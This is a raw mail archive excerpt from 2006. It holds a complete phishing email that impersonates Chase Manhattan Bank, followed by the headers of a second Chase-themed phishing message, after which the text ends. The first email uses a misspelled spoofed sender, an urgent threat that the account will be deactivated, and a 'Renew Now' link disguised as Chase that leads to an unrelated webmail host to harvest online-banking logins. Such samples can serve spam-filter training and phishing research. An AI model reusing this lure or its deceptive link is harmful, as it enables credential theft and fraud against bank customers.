From: online-sevice@chase.com
Reply-To: online-sevice@chase.com
MIME-Version: 1.0 Content-Type: text/html\r\n
Content-Type: text/html Content-Transfer-Encoding: 8bit\r\n
Subject: Chase Online Banking Service
Message-Id: <20060720004747.DFDDACC4E@gaia.psdn.org.ph>
Date: Thu, 20 Jul 2006 08:47:47 +0800 (PHT)
To: undisclosed-recipients:;
Status: R
X-Status: 
X-Keywords:                  


<FONT face=Arial size=2><table><tr><TD width=427  
          height=72><IMG src="http://www.chase.com/ccpmweb/shared/image/chaseNewlogo.gif"></TD></tr></table><BR>
&nbsp;&nbsp;&nbsp;&nbsp;Dear Chase Manhattan Bank Member,
&nbsp; </FONT>
<DIV>
  <p><font size="2" face="Arial">&nbsp;&nbsp;&nbsp;&nbsp;This is your official notification from Chase Manhattan Bank
    that
  the<br> &nbsp;&nbsp;&nbsp;&nbsp;service(s) listed below  will be
   deactivated and deleted if not
  </font><font size="2" face="Arial">renewed<br>&nbsp;&nbsp;&nbsp;&nbsp;immediately. Previous notifications
    have been sent to the
    Billing <br>&nbsp;&nbsp;&nbsp;&nbsp;Contact assigned to this account.
    As the
    Primary Contact, 
    you must<br>&nbsp;&nbsp;&nbsp;&nbsp;renew the service(s) listed below or it will
    be deactivated and deleted. <br>&nbsp;&nbsp;&nbsp;&nbsp;<A onfiltered="return ShowLinkWarning()" href="http://webmail.cygnusin.com/.chase.com/index.html" onclick="return ShowLinkWarning()"><FONT color=#003399>Renew Now</FONT></A></font></p>
</DIV>
<FONT face=Arial size=2><DIV><FONT color=#003399></FONT>&nbsp;</DIV>
</FONT><DIV><font size="2" face="Arial"><BR>
  &nbsp;&nbsp; SERVICE : Chase Manhattan Bank Online Banking Service<BR>
  &nbsp;&nbsp; EXPIRATION: July &nbsp;23, 2006</font></DIV>
<FONT face=Arial size=2><DIV>&nbsp;</DIV>
<DIV><BR>&nbsp;&nbsp; Thank you,</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp;&nbsp;<FONT face=Arial size=2>Chase Manhattan Bank</FONT>&nbsp;Management 
  Center Customer Support</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>&nbsp;&nbsp; **************************************************************<BR>&nbsp;&nbsp; IMPORTANT CUSTOMER SUPPORT INFORMATION<BR>&nbsp;&nbsp; **************************************************************</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; Please do not reply to this message.</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; Document Reference: (87051203).</DIV>
<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; <FONT face=Arial size=2>Chase Manhattan Bank</FONT>, 
  N.A. Member FDIC. Equal Housing Lender.<BR>
  &nbsp;&nbsp; Copyright © 2006 <FONT face=Arial size=2>Chase Manhattan Bank</FONT>, N.A. All rights reserved.</DIV>
</FONT>

From nobody@server1.teris.de  Wed Jul 19 21:05:45 2006
Return-Path: <nobody@server1.teris.de>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by funky.example.com (Postfix) with ESMTP id 8440446983
	for <nobody@login.example.com>; Wed, 19 Jul 2006 21:05:45 -0400 (EDT)
Received: from server1.teris.de (server1.teris.de [83.137.101.10])
	by mail2.example.com (Postfix) with ESMTP id B840F6FA542
	for <nobody@example.com>; Wed, 19 Jul 2006 21:05:45 -0400 (EDT)
Received: by server1.teris.de (Postfix, from userid 65534)
	id 24DBE7DFFA; Thu, 20 Jul 2006 02:58:20 +0200 (CEST)
To: nobody@example.com
Subject: Activate Your Chase Account !
